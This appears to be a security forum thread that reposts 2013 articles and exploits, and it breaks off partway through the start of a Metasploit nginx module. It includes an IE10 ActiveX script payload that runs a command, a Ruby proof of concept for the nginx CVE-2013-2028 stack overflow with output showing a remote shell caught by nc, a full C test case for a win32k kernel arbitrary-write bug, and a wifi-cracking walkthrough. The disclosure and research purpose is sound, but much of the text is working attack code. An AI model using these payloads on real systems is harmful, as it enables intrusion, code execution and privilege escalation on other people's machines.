Nytro

Testat - functional pe IE10 <script>function run(f){var x=new ActiveXObject("WScript.Shell");x.run(f,0);}run('%comspec% /c calc')</script> Via @brutelogic

Researcher Unlocks Samsung Galaxy S4 Bootloader for AT&T, Verizon Android Phones by Michael Mimoso Those of you who like to tinker and jailbreak Android phones should take notice of some new research conducted on Samsung Galaxy S4 Android devices shipped by AT&T and Verizon. Both device makers ship the Galaxy S4 smartphones with a locked down bootloader that prevents users from uploading custom kernels or from making modifications to software on the phone. Azimuth Security researcher Dan Rosenberg has found a vulnerability in the manner in which the devices do cryptographic checks of boot image signatures and was able to exploit the flaw and upload his own unsigned kernel to the device. An attacker could do the same and upload a malicious kernel or software and own the device. Rosenberg has previously published work on Android devices built by Motorola where he was able to exploit a hole in the TrustZones deployed in the devices’ ARM processor. TrustZones are security extensions to the processor that essentially run a secure kernel alongside the main kernel where sensitive applications such as mobile payment apps may execute. Motorola was using TrustZones to also control a lockdown of the bootloader. The AT&T and Verizon devices are built on the Qualcomm APQ8064T chip which relies on its QFuses technology to implement a trusted boot sequence, Rosenberg said. The technology, which is a one-time configuration of hashes and keys, cryptographically verifies the next stage of boot up before it’s launched and then Samsung’s application secondary bootloader (APPSL) runs. “This bootloader differs between locked and unlocked variants of the Galaxy S4 in its enforcement of signature checks on the boot and recovery partitions,” Rosenberg said. Rosenberg discovered that the aboot bootloader on the devices is nearly identical to the open source Little Kernel bootloader project, which he said aided him in finding the functions that implement signature verification and booting of the Linux kernel. Once a particular boot function determines whether it is to load the main kernel or a recovery subsystem, it loads the appropriate partition into memory from the eMMC flash storage on the phone, Rosenberg said. That programming logic is flawed, Rosenberg said. “Because the boot image header is read straight from eMMC flash prior to any signature validation, it contains essentially untrusted data,” Rosenberg said. “As a result, it’s possible to flash a maliciously crafted boot image whose header values cause aboot to read the kernel or ramdisk into physical memory directly on top of aboot itself.” Signature checks are done after the kernel image is loaded, but if an attacker is able to access the process before this step, he can beat the signature validation. Aboot, for example, uses an open source implementation of RSA encryption for signature validation which compares the decrypted signature of the boot image to the SHA1 hash of the boot image, Rosenberg said. Rosenberg said his exploit was a boot image where the ramdisk load address was equal to the address of the signature verification function in aboot. Rosenberg replaced the ramdisk with shellcode and flashed this image instead. Aboot reads the exploit image instead from flash and overwrites the signature check function with the shellcode. “The shellcode simply patches up the boot image header to contain sane values, copies the actual kernel and ramdisk into appropriate locations in memory, and returns zero, indicating the signature verification succeeded,” Rosenberg said. More info: http://blog.azimuthsecurity.com/2013/05/exploiting-samsung-galaxy-s4-secure-boot.html Sursa: Samsung Galaxy S4 Android Bootloader Unlocked | Threatpost

[h=3]Changes to our SSL Certificates[/h] [h=2]Thursday, May 23, 2013 8:00 AM[/h] Posted by Stephen McHenry, Director of Information Security Engineering Protecting the security and privacy of our users is one of our most important tasks at Google, which is why we utilize encryption on almost all connections made to Google. This encryption needs to be updated at times to make it even stronger, so this year our SSL services will undergo a series of certificate upgrades—specifically, all of our SSL certificates will be upgraded to 2048-bit keys by the end of 2013. We will begin switching to the new 2048-bit certificates on August 1st, to ensure adequate time for a careful rollout before the end of the year. We’re also going to change the root certificate that signs all of our SSL certificates because it has a 1024-bit key. Most client software won’t have any problems with either of these changes, but we know that some configurations will require some extra steps to avoid complications. This is more often true of client software embedded in devices such as certain types of phones, printers, set-top boxes, gaming consoles, and cameras. For a smooth upgrade, client software that makes SSL connections to Google (e.g. HTTPS) must: Perform normal validation of the certificate chain; Include a properly extensive set of root certificates contained. We have an example set which should be sufficient for connecting to Google in our FAQ. (Note: the contents of this list may change over time, so clients should have a way to update themselves as changes occur); Support Subject Alternative Names (SANs). Also, clients should support the Server Name Indication (SNI) extension because clients may need to make an extra API call to set the hostname on an SSL connection. Any client unsure about SNI support can be tested against https://googlemail.com—this URL should only validate if you are sending SNI. On the flip side, here are some examples of improper validation practices that could very well lead to the inability of client software to connect to Google using SSL after the upgrade: Matching the leaf certificate exactly (e.g. by hashing it) Matching any other certificate (e.g. Root or Intermediate signing certificate) exactly Hard-coding the expected Root certificate, especially in firmware. This is sometimes done based on assumptions like the following: The Root Certificate of our chain will not change on short notice. Google will always use Thawte as its Root CA. Google will always use Equifax as its Root CA. Google will always use one of a small number of Root CAs. The certificate will always contain exactly the expected hostname in the Common Name field and therefore clients do not need to worry about SANs. The certificate will always contain exactly the expected hostname in a SAN and therefore clients don't need to worry about wildcards. Any software that contains these improper validation practices should be changed. More detailed information can be found in this document, and you can also check out our FAQ if you have specific questions. Sursa: Google Online Security Blog: Changes to our SSL Certificates

Easily Assessing Wireless Networks with Kali Linux Posted by Brent Mills in Information Security on May 22, 2013 10:05:02 AM NOTE: The information contained in this tutorial is directed toward the Kali Linux distribution, but can also apply to other Linux varieties if the appropriate tools are installed. All tools used in this tutorial are freely available. For the purposes of this article, all ESSIDs and BSSIDs have been pixelated. When you run actual scans, you will be able to see these values. SETTING YOUR WIRELESS CARD TO MONITOR MODE: Before using any wifi pen testing tool, you will need to set your wireless interface to Monitor mode. First, find out which wireless interfaces are available by running iwconfig from the command line. The response to this command tells you a few things. We know that the wireless interface on this system is wlan0 (Be wary as this may not be wlan0 after a reboot. Some systems shuffle the interface name on reboot.), we know that Wlan0 is not associated with an access point (not connected to a wireless network), and we know that the Tx-Power (transmit power) of this interface is 15dBm. Depending on your drivers, you can bump this setting as high as 30dBm, though most systems are now limited to 20dBm to conserve power and avoid over-heating your wireless card. To adjust your transmit power, run the following: # iwconfig wlan0 txpower 30 In order to set an interface to Monitor Mode (Using the example of wlan0), you should run airmon-ng start wlan0. Airmon-ng (part of the Aircrack suite) has now created a new interface called mon0 which is a sub-interface of wlan0 and is set to Monitor Mode. You can now use the command airodump-ng mon0 to view the wireless traffic in your area. THIS IS NOT AN ATTACK OF ANY KIND - IT SIMPLY LISTENS TO PASSING TRAFFIC IN YOUR AREA. FEEL FREE TO TRY IT OUT While using airomon-ng, the BSSID field shows the MAC addresses of nearby wireless networks. ESSID shows the names (SSIDs) of these networks. PWR shows the power of each network, which helps to determine its location and your likelihood of cracking the wifi password (the greater the power, the better your chances. NOTE: Power is never negative, but is shown that way in airodump-ng depending upon the version of the rt18187 module that is installed. This can be fixed by accessing the terminal and running airdriver-ng unload 36, then running airdriver-ng load 35.) CH shows the channel on which a given network is broadcasting. ENC shows the encryption standard employed by each network. WEP networks are the easiest to crack, followed by WPA, and then WPA2. CIPHER and AUTH both provide further information as to how the network is secured. In the lower section of the terminal, you will notice that each BSSID entry is associated with a STATION. The STATION is a device which is reaching out for a network. PROBE indicates the network that the STATION is trying to reach. More often than not, you’ll see a response of (not associated), meaning that the desired network isn’t available, the device didn’t connect, etc. If you see a real MAC address in the BSSID field, then the STATION has just connected to that network. Now it’s time to actually do something with all this traffic! USING FERN-WIFI-CRACKER TO PEN TEST WIRELESS NETWORKS Fern-Wifi-Cracker is a free, GUI-based tool that uses the aircrack suite to attack wireless networks. Fern can be launched from the Kali Linux application menu under Wireless Attacks >> Wireless Tools >> fern-wifi-cracker. The Fern interface is pretty intuitive and will allow you to point and click your way through a wireless assessment (to an extent). In order to search for available networks, simply choose an interface from the dropdown Interface list and click the button to Scan for Access Points. After a few seconds, you’ll see networks begin showing up next to both the WEP button and the WPA button. Click either the WEP or WPA button to choose a target. As the names suggest, each button is related to an encryption standard and will list the available wireless access points using that particular encryption standard. Now choose your target network from the list, click the Attack button, and wait... NOTE: If you choose to update Fern, it will stop working. This is because the updater is broken. Don’t worry though – it’s an easy fix. From the command line, run the following: chmod +x /usr/share/fern-wifi-cracker/resources/execute.py. As soon as you run this command, Fern will begin operating normally again. USING WIFITE TO PEN TEST A WIRELESS NETWORK If you are comfortable using the command line, a somewhat more powerful tool available to you is Wifite. You can call wifite directly from the command line by running wifite. Wifite will begin scanning for local networks and start gathering data on devices which connect to these networks. Once you are satisfied that you have gathered enough data (I recommend waiting about 3-5 minutes), hit CTRL + C to stop scanning and select a target. Enter the number of your target network and hit ENTER to begin an attack against that network. You want to target networks that are marked with client or clients - These networks are actively communicating with a wireless device, making them even more vulnerable. Wifite automatically iterates through multiple attack types supported by Aircrack-ng in order to give you the best chances of success. Further Information on Aircrack-ng: For more information / tutorials around Aircrack-ng, visit main [Aircrack-ng]. Sursa: https://community.rapid7.com/community/infosec/blog/2013/05/22/easily-assessing-wireless-networks-with-kali-linux

[h=1]Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-2028)[/h]May 21, 2013 by w00d A few days after the release of nginx advisory (CVE-2013-2028), we managed to successfully exploit the vulnerability with a full control over the program flow. However, in order to make it more reliable and useful in real world environment, we still explored several program paths and found some other attack vectors. Since the exploit for Nginx 32-bit is available on Metasploit now, we decide to publish some of our works here. In this post, you will find a quick analysis for the vulnerability and an exploitation for a 64-bit linux server using the stack based overflow attack vector. [h=3]The Bug[/h] Based on the patch on nginx.org, there is a code path that leads to a stack based overflow vulnerability, related to 03 different nginx components 1) The calculation of “chunked size” when someone send a http request with the header: “Transfer-Encoding: chunked”. It is calculated at src/http/ngx_http_parse.c:2011 if (ch >= '0' && ch <= '9') { ctx->size = ctx->size * 16 + (ch - '0'); break; } c = (u_char) (ch | 0x20); if (c >= 'a' && c <= 'f') { ctx->size = ctx->size * 16 + (c - 'a' + 10); break; } It simply parses the chunked size input as hex and convert it to base of 10. And since ctx->size is defined with size_t, an unsigned type, the value of the variable can be misinterpreted as negative number when casting to signed type, as we will see later. 2) Nginx module when serving static file: When nginx is setup to serve static file (which is the default setting), ngx_http_static_handler in src/http/modules/ngx_http_static_module.c:49 will be executed when receiving a request. ngx_http_static_handler will then call ngx_http_discard_request_body at src/http/modules/ngx_http_static_module.c:211. ngx_http_discard_request_body will then call ngx_http_read_discarded_request_body at src/http/ngx_http_request_body.c:526. In summary the code path: ngx_http_static_handler->ngx_http_static_handler->ngx_http_discard_request_body->ngx_http_read_discarded_request_body ngx_http_read_discarded_request_body is where it gets interesting, we can see a buffer with fixed size is defined at src/http/ngx_http_request_body.c:630 as follows: static ngx_int_t ngx_http_read_discarded_request_body(ngx_http_request_t *r) { size_t size; ssize_t n; ngx_int_t rc; ngx_buf_t b; u_char buffer[NGX_HTTP_DISCARD_BUFFER_SIZE]; NGX_HTTP_DISCARD_BUFFER_SIZE is defined as 4096 in src/http/ngx_http_request.h:19 The interesting is at how this buffer is filled at src/http/ngx_http_request_body.c:649 that we shall use later in (3) size = (size_t) ngx_min(r->headers_in.content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE); n = r->connection->recv(r->connection, buffer, size); 3) The state transition when parsing http request Come back to src/http/ngx_http_request_body.c, before calling ngx_http_read_discarded_request_body, nginx check whether we have a “chunked” type of request, it will then run ngx_http_discard_request_body_filter defined in src/http/ngx_http_request_body.c:680. ngx_http_discard_request_body_filter will execute ngx_http_parse_chunked which is the code we mentioned in (1). After that, the return value “rc” is checked with some constant to decide the next move. One of them is particularly very interesting. if (rc == NGX_AGAIN) { /* set amount of data we want to see next time */ r->headers_in.content_length_n = rb->chunked->length; break; } Suppose we can set rb->chunked->length as a very large number at (1), and then set rc = NGX_AGAIN at (3,) following events will happen: - r->headers_in.content_length_n is set to negative ( as it is defined with `off_t` which is “a signed integer” type.). - The function ngx_http_discard_request_body_filter return and the program move to execute ngx_http_read_discarded_request_body. which contains our vulnerable buffer. - Finally the recv() command is tricked to receive more than 4096 bytes and overflow the buffer on the stack. There are many ways to set chunked->length, since rb->chunked->length is assigned at the end of ngx_http_parse_chunked function based on the rb->chunked->size that we have a direct control. switch (state) { case sw_chunk_start: ctx->length = 3 /* "0" LF LF */; break; case sw_chunk_size: ctx->length = 2 /* LF LF */ + (ctx->size ? ctx->size + 4 /* LF "0" LF LF */ : 0); To make rc = NGX_AGAIN, we realize that for a request nginx makes the first recv with 1024 bytes, so if we send more than 1024 bytes ngx_http_parse_chunked will return with a NGX_AGAIN then when nginx tries to recv again it will be right into our setup. The payload to overflow the stack buffer is as followed: - Send http request with a “transfer-encoding: chunked” - Send a large hexadecimal number to fill the entire 1024 bytes of the first read - Send > 4096 bytes to overflow the buffer when it try to recv the second times TL;DR ? Here is the proof of concept for x64 require 'ronin' tcp_connect(ARGV[0],ARGV[1].to_i) { |s| payload = ["GET / HTTP/1.1\r\n", "Host: 1337.vnsecurity.net\r\n", "Accept: */*\r\n", "Transfer-Encoding: chunked\r\n\r\n"].join payload << "f"*(1024-payload.length-8) + "0f0f0f0f" #chunked payload << "A"*(4096+8) #padding payload << "C"*8 #cookie s.send(payload, 0) } strace output at the other end: strace -p 11337 -s 5000 2>&1 | grep recv recvfrom(3, "GET / HTTP/1.1\r\nHost: 1337.vnsecurity.net\r\nAccept: */*\r\nTransfer-Encoding: chunked\r\n\r\nfff...snip..fff0f0f0f0f", 1024, 0, NULL, NULL) = 1024 recvfrom(3, "AAA..snip..AACCCCCCCC", 18446744069667229461, 0, NULL, NULL) = 4112 [h=3]Exploitation on x64:[/h] The problem of stack cookie/carnary can be overcome easily by brute-forcing byte by byte. If we send an extra byte and a worker process crashes, it will return nothing thus we know our cookie value is wrong, we try another value until we receive some output. Then we need to bypass ASLR and DEP. The exploitation for 32-bit in the metasploit module won’t work, since it will bruteforce the libc address and it’s not feasible given the large address space in x64. We give an exploit that only relies on the binary i.e. we build the ROP gadget from the binary. mprotect address is computed from mmap64 address (in the GOT-table) then use to allocate a writable-executable memory chunked. Then we use some ROP gadgets to copy our shellcode and have it executed by return to it finally. TL;DR full exploit code could be find here ruby exp-nginx.rb 1.2.3.4 4321 [+] searching for byte: 1 214 [+] searching for byte: 2 102 [+] searching for byte: 3 232 [+] searching for byte: 4 213 [+] searching for byte: 5 103 [+] searching for byte: 6 151 [+] searching for byte: 7 45 Found cookie: \x00\xd6\x66\xe8\xd5\x67\x97\x2d 8 PRESS ENTER TO GIVE THE SHIT TO THE HOLE AT w.w.w.w 4000 1120 connections At w.w.w.w nc -lvvv 4000 Connection from 1.2.3.4 port 4000 [tcp/*] accepted uname -a Linux ip-10-80-253-191 3.2.0-40-virtual #64-Ubuntu SMP Mon Mar 25 21:42:18 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux id uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),110(netdev),111(admin) ps aux | grep nginx ubuntu 2920 0.1 0.0 13920 668 ? Ss 15:11 0:01 nginx: master process ./sbin/nginx ubuntu 5037 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process ubuntu 5039 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process ubuntu 5041 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process [h=3]Reliable exploitation[/h] There are some reasons that the above exploitation/technique may not work in practice: 1) Nginx uses non-blocking recv(). If we can’t send enough data to overwrite the return address/cookie the exploit will failed. This is mostly the case since the normal server will be loaded with requests from different user. 2) Our analysis here is for the default setting of nginx, the code path can be very different with another setting thus making the exploit somewhat useless. 3) A blind attack is difficult without the knowledge of the binary / OS at the remote server. For 32-bit OS, one may further bruteforce the “write” address in the code space in order to leak information but It will still fail for PIE. Trying to make this more practical in real world environments, we actually found another attack vector which is more reliable and worked on several nginx settings. However, we will keep it for another post. Sursa: Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-2028) : VNSECURITY / CLGT TEAM

Debian GNU/Hurd 2013 released! It is with huge pleasure that the Debian GNU/Hurd team announces the release of Debian GNU/Hurd 2013. This is a snapshot of Debian "sid" at the time of the Debian "wheezy" release (May 2013), so it is mostly based on the same sources. It is not an official Debian release, but it is an official Debian GNU/Hurd port release. The installation ISO images can be downloaded from Debian Ports in the usual three Debian flavors: NETINST, CD, DVD. Besides the friendly Debian installer, a pre-installed disk image is also available, making it even easier to try Debian GNU/Hurd. Debian GNU/Hurd is currently available for the i386 architecture with more than 10.000 software packages available (more than 75% of the Debian archive, and more to come!). Please make sure to read the configuration information, the FAQ, and the translator primer to get a grasp of the great features of GNU/Hurd. Due to the very small number of developers, our progress of the project has not been as fast as other successful operating systems, but we believe to have reached a very decent state, even with our limited resources. We would like to thank all the people who have worked on GNU/Hurd over the past decades. There were not many people at any given time (and still not many people today, please join!), but in the end a lot of people have contributed one way or another. Thanks everybody! The GNU Hurd is the GNU project's replacement for the Unix kernel. It is a collection of servers that run on the Mach microkernel to implement file systems, network protocols, file access control, and other features that are implemented by the Unix kernel or similar kernels (such as Linux). More detailed. GNU Mach is the microkernel upon which a GNU Hurd system is based. It provides an Inter Process Communication (IPC) mechanism that the Hurd uses to define interfaces for implementing in a distributed multi-server fashion the services a traditional operating system kernel provides. More detailed. Sursa: 2013-05-debian gnu hurd 2013

[h=2]win32k!EPATHOBJ::pprFlattenRec Uninitialized Next Pointer Testcase[/h] I'm quite proud of this list cycle trick, here's how to turn it into an arbitrary write. First, we create a watchdog thread that will patch the list atomically when we're ready. This is needed because we can't exploit the bug while HeavyAllocPool is failing, because of the early exit in pprFlattenRec: .text:BFA122B8 call newpathrec ; EPATHOBJ::newpathrec(_PATHRECORD * *,ulong *,ulong) .text:BFA122BD cmp eax, 1 ; Check for failure .text:BFA122C0 jz short continue .text:BFA122C2 xor eax, eax ; Exit early .text:BFA122C4 jmp early_exit So we create a list node like this: PathRecord->Next = PathRecord; PathRecord->Flags = 0; Then EPATHOBJ::bFlatten() spins forever doing nothing: BOOL __thiscall EPATHOBJ::bFlatten(EPATHOBJ *this) { /* ... */ for ( ppr = ppath->pprfirst; ppr; ppr = ppr->pprnext ) { if ( ppr->flags & PD_BEZIER ) { ppr = EPATHOBJ::pprFlattenRec(pathobj, ppr); } } /* ... */ } While it's spinning, we clean up in another thread, then patch the thread (we can do this, because it's now in userspace) to trigger the exploit. The first block of pprFlattenRec does something like this: if ( pprNew->pprPrev ) pprNew->pprPrev->pprnext = pprNew; Let's make that write to 0xCCCCCCCC. DWORD WINAPI WatchdogThread(LPVOID Parameter) { // This routine waits for a mutex object to timeout, then patches the // compromised linked list to point to an exploit. We need to do this. LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex () %p", GetCurrentThreadId(), Mutex); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { // It looks like the main thread is stuck in a call to FlattenPath(), // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean // up, and then patch the list to trigger our exploit. while (NumRegion--) DeleteObject(Regions[NumRegion]); LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord); InterlockedExchangePointer(&PathRecord->next, &ExploitRecord); } else { LogMessage(L_ERROR, "Mutex object did not timeout, list not patched"); } return 0; } PathRecord->next = PathRecord; PathRecord->prev = (PVOID)(0x42424242); PathRecord->flags = 0; ExploitRecord.next = NULL; ExploitRecord.prev = 0xCCCCCCCC; ExploitRecord.flags = PD_BEZIERS; Here's the output on Windows 8: kd> g ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* Use !analyze -v to get detailed debugging information. BugCheck 50, {cccccccc, 1, 8f18972e, 2} *** WARNING: Unable to verify checksum for ComplexPath.exe *** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 ) Followup: MachineOwner --------- nt!RtlpBreakWithStatusInstruction: 810f46f4 cc int 3 kd> kv ChildEBP RetAddr Args to Child a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0]) a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo]) a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4]) a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6 a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19 a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868 a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4]) a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame @ a03aba2c) a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo]) a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0]) a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4]) a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ a03abc14) 0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0]) 0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0]) WARNING: Stack unwind information not available. Following frames may be wrong. 0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f 0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade 0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo]) 0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [SEH]) 0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo]) kd> .trap a03aba2c ErrCode = 00000002 eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8 eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0 nv up ei ng nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010286 win32k!EPATHOBJ::pprFlattenRec+0x82: 8f18972e 8918 mov dword ptr [eax],ebx ds:0023:cccccccc=???????? kd> vertarget Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible Product: WinNt, suite: TerminalServer SingleUserTS Built by: 9200.16581.x86fre.win8_gdr.130410-1505 Machine Name: Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48 Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00) System Uptime: 0 days 0:02:30.432 kd> .bugcheck Bugcheck code 00000050 Arguments cccccccc 00000001 8f18972e 00000002 Demo code attached. I have a working exploit that grants SYSTEM on all currently supported versions of Windows. Code is available on request to students from reputable schools. If nobody else on the list can figure out the final details, then I've lost faith in the next generation Tavis. #ifndef WIN32_NO_STATUS # define WIN32_NO_STATUS #endif #include <windows.h> #include <assert.h> #include <stdio.h> #include <stddef.h> #include <winnt.h> #ifdef WIN32_NO_STATUS # undef WIN32_NO_STATUS #endif #include <ntstatus.h> #pragma comment(lib, "gdi32") #pragma comment(lib, "kernel32") #pragma comment(lib, "user32") #define MAX_POLYPOINTS (8192 * 3) #define MAX_REGIONS 8192 #define CYCLE_TIMEOUT 10000 // // win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase. // // Tavis Ormandy <taviso () cmpxchg8b com>, March 2013 // POINT Points[MAX_POLYPOINTS]; BYTE PointTypes[MAX_POLYPOINTS]; HRGN Regions[MAX_REGIONS]; ULONG NumRegion; HANDLE Mutex; // Log levels. typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL; BOOL LogMessage(LEVEL Level, PCHAR Format, ...); // Copied from winddi.h from the DDK #define PD_BEGINSUBPATH 0x00000001 #define PD_ENDSUBPATH 0x00000002 #define PD_RESETSTYLE 0x00000004 #define PD_CLOSEFIGURE 0x00000008 #define PD_BEZIERS 0x00000010 typedef struct _POINTFIX { ULONG x; ULONG y; } POINTFIX, *PPOINTFIX; // Approximated from reverse engineering. typedef struct _PATHRECORD { struct _PATHRECORD *next; struct _PATHRECORD *prev; ULONG flags; ULONG count; POINTFIX points[0]; } PATHRECORD, *PPATHRECORD; PPATHRECORD PathRecord; PATHRECORD ExploitRecord; DWORD WINAPI WatchdogThread(LPVOID Parameter) { // This routine waits for a mutex object to timeout, then patches the // compromised linked list to point to an exploit. We need to do this. LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex () %p", GetCurrentThreadId(), Mutex); if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) { // It looks like the main thread is stuck in a call to FlattenPath(), // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean // up, and then patch the list to trigger our exploit. while (NumRegion--) DeleteObject(Regions[NumRegion]); LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord); InterlockedExchangePointer(&PathRecord->next, &ExploitRecord); } else { LogMessage(L_ERROR, "Mutex object did not timeout, list not patched"); } return 0; } int main(int argc, char **argv) { HANDLE Thread; HDC Device; ULONG Size; HRGN Buffer; ULONG PointNum; ULONG Count; // Create our PATHRECORD in userspace we will get added to the EPATHOBJ // pathrecord chain. PathRecord = VirtualAlloc(NULL, sizeof(PATHRECORD), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); LogMessage(L_INFO, "Alllocated userspace PATHRECORD () %p", PathRecord); // Initialise with recognisable debugging values. FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC); PathRecord->next = PathRecord; PathRecord->prev = (PVOID)(0x42424242); // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite // loop in EPATHOBJ::bFlatten(). PathRecord->flags = 0; LogMessage(L_INFO, " ->next @ %p", PathRecord->next); LogMessage(L_INFO, " ->prev @ %p", PathRecord->prev); LogMessage(L_INFO, " ->flags @ %u", PathRecord->flags); ExploitRecord.next = NULL; ExploitRecord.prev = 0xCCCCCCCC; ExploitRecord.flags = PD_BEZIERS; LogMessage(L_INFO, "Creating complex bezier path with %#x", (ULONG)(PathRecord) >> 4); // Generate a large number of Bezier Curves made up of pointers to our // PATHRECORD object. for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) { Points[PointNum].x = (ULONG)(PathRecord) >> 4; Points[PointNum].y = (ULONG)(PathRecord) >> 4; PointTypes[PointNum] = PT_BEZIERTO; } // Switch to a dedicated desktop so we don't spam the visible desktop with // our Lines (Not required, just stops the screen from redrawing slowly). SetThreadDesktop(CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL)); Mutex = CreateMutex(NULL, TRUE, NULL); // Get a handle to this Desktop. Device = GetDC(NULL); // Spawn a thread to cleanup Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL); // We need to cause a specific AllocObject() to fail to trigger the // exploitable condition. To do this, I create a large number of rounded // rectangular regions until they start failing. I don't think it matters // what you use to exhaust paged memory, there is probably a better way. // // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on // failure. Seriously, do some damn QA Microsoft, wtf. for (Size = 1 << 26; Size; Size >>= 1) { while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1)) NumRegion++; } LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion); LogMessage(L_INFO, "Flattening curves..."); // Begin filling the free list with our points. for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) { BeginPath(Device); PolyDraw(Device, Points, PointTypes, PointNum); EndPath(Device); FlattenPath(Device); FlattenPath(Device); EndPath(Device); } LogMessage(L_INFO, "No luck, cleaning up"); // If we reach here, we didn't trigger the condition. Let the other thread know. ReleaseMutex(Mutex); ReleaseDC(NULL, Device); WaitForSingleObject(Thread, INFINITE); return 0; } // A quick logging routine for debug messages. BOOL LogMessage(LEVEL Level, PCHAR Format, ...) { CHAR Buffer[1024] = {0}; va_list Args; va_start(Args, Format); vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args); va_end(Args); switch (Level) { case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break; case L_INFO: fprintf(stdout, "[+] %s\n", Buffer); break; case L_WARN: fprintf(stderr, " [*] %s\n", Buffer); break; case L_ERROR: fprintf(stderr, "[!] %s\n\a", Buffer); break; } fflush(stdout); fflush(stderr); return TRUE; } Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team

Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow Authored by Greg MacManus, hal, saelo | Site metasploit.com This Metasploit module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible. }, 'Author' => [ 'Greg MacManus', # original discovery 'hal', # Metasploit module 'saelo' # Metasploit module ], 'DisclosureDate' => 'May 07 2013', 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-2028'], ['OSVDB', '93037'], ['URL', 